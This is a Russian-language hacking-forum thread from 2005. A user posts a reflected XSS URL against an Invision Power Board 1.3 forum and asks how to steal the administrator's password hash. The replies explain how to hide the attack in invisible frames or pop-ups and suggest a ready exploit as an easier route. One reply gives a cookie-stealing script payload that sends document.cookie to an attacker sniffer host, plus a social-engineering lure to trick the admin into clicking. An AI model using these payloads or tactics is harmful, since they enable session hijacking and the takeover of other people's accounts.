Вопрос про использование xss в Invision Power Board 1.3(U) Final

Discussion in 'Песочница' started by badboy, 27 Jul 2005.

  1. badboy

    badboy Banned

    Joined:
    14 Mar 2005
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Кароче есть сайт http://victim.com/
    На нём расположен форум Invision Power Board 1.3(U) Final
    Нашёл XSS:http://victim.com/?c='><script>alert(document.cookie)</script><plaintext>

    Пожалуйста объясните как я могу заполучить хэш админа.
    Если надо вставить код со снифером,то пожалуйста напишите какойи куда вставлять...
     
  2. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Что-то сайт какой-то странный, рисуночек такой "Go Away!"
     
  3. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
    ...
    Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS.
     
    _________________________
  4. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Фэйковый - липовый
    Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой:
    + в самом фрамесете подстра***ся и влепи код (но работать будет тока в ИЕ)
    Чтобы большинство не видело что идет загрузка с другого сайта.
    ...
    Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться.
     
    _________________________
  5. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.
     
  6. Papercut

    Papercut Elder - Старейшина

    Joined:
    23 Oct 2006
    Messages:
    37
    Likes Received:
    3
    Reputations:
    0
    Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
    мне сплоиты не вытягивали хэши
     
  7. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Дак тебе не кто и негарантировал что сплойты на всех форумах работать будут...;)
     
  8. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Вы от куда попадали ? тутанхамоны наши =)
     
  9. Diablo

    Diablo Elder - Старейшина

    Joined:
    7 Nov 2005
    Messages:
    132
    Likes Received:
    34
    Reputations:
    12
    хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss :D. Не пинайте сильно :). Если админ лох - прокатит :)
     
Loading...
Similar Threads - Вопрос использование Invision
  1. gilo20
    Replies:
    2
    Views:
    2,545
  2. Dobi768
    Replies:
    2
    Views:
    2,445
  3. avva99on
    Replies:
    0
    Views:
    2,441